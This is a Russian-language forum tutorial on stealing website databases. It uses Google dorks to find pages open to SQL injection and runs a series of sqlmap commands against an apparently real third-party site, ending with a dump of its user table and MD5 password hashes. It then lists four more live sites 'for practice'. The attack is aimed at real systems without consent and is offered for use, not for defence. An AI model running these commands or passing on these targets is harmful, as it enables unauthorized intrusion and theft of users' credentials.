SQLMap- Kali Linux или как слить БД сайта.
@Garant_CopyВсем привет, написал мануал по сливу баз данных с сайтов.
Для этого нам понадобится
Kali linux (так же он есть на win)
Дорки (поисковые запросы для поиска сайтов с уязвимостью) их я оставлю в конце статьи
Шаг 1.
Первое что мы сделаем, это найдем сайты, уязвимые к SQL-инъекции. Есть очень много способов выявить её, но для меня самый лучший останеться поиск по доркам.
И так, пристуим.
Допустим вы ищите используя эту строку look.php?id= , и вы получили один из веб сайтов на примере этого:
http://www.wlnetwork.com/membership/look.php?id=69
что бы проверить его на уязвимость, просто подставьте в конец ссылки «'» такой знак в результате вы должны получить вот это
http://www.wlnetwork.com/membership/look.php?id=69'
Если страница вернёт SQL ошибку, либо пропадет часть контента, значит страница уязвима для SQLMAP SQL-инъекции. Если она загружается или перенаправляет вас на другую страницу, переходите к следующей странице в результатах поиска Гугл.
посмотрите на скришоты ниже:
Шаг 2.
Строим список баз данных СУБД используя SQLMAP SQL-инъекцию
Заходим в терминал Linux и пишем вот такую команду
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 --dbs
Обзор команды
sqlmap — имя бинарного файла программы sqlmap.
-u — целевой адрес например (http://www.wlnetwork.com/membership/look.php?id=69)
--dbs — перечислить какие базы данных присутсвуют на сайте.[/spoiler]
и так, сейчас у нас всего 1 база данных, information_schema это стандартная база данных которая есть почти в каждом СУБД MySQL. Это значит что мы направим свой инетерс на бд wlndemc_membersdb.
Шаг 3.
Построение списка таблиц базы данных.
Нам нужно знать как много таблицы имеются в СУБД этого веб-сайта и какие у них имена. Чтобы найти эту информацию выполните следующую команду:
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 -D wlndemc_membersdb --tables
Круто, это база имеет 114 таблиц.
Ну и конечно мы хотим проверить, что находится внутри think_user, используя SQLMAP SQL-инъекцию, поскольку, возможно, именно она содержит имя пользователя и пароль.
Шаг 4.
Построение списка столбцов целевой таблицы.
Сейчас нам нужно построить список столбцов целевой таблицы admin базы данных нашего веб-сайта, используя SQLMAP SQL-инъекцию. SQLMAP SQL-инъекция делает это действительно простым, запустите следующую команду:
sqlmap -uhttp://www.wlnetwork.com/membership/look.php?id=69 -D wlndemc_membersdb -T think_user --columns
Ага, вот и то что мы искали) осталось только вытянуть пароли и все остальное).
Шаг 5
С помощью SQLMAP SQL-инъекции построим список пользователей из целевого столбца выбранной базы данных.
всё это делаем вот такой командой:
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 -D wlndemc_membersdb -T think_user --dump
как мы видим у нас пароли в виде хеша md5. Вот самые лучшие сервисы который вам помогут расшифровать md5
Вот еще пару сайтов для тренеровки
https://bfgroup.io/blog-preview.php?id=8
http://www.ttn.si/cms/preview.php?id=32
http://petsstop.com/category.php?id=31
http://www.portraitsbywelcomeaboard.com/preview.php?id=1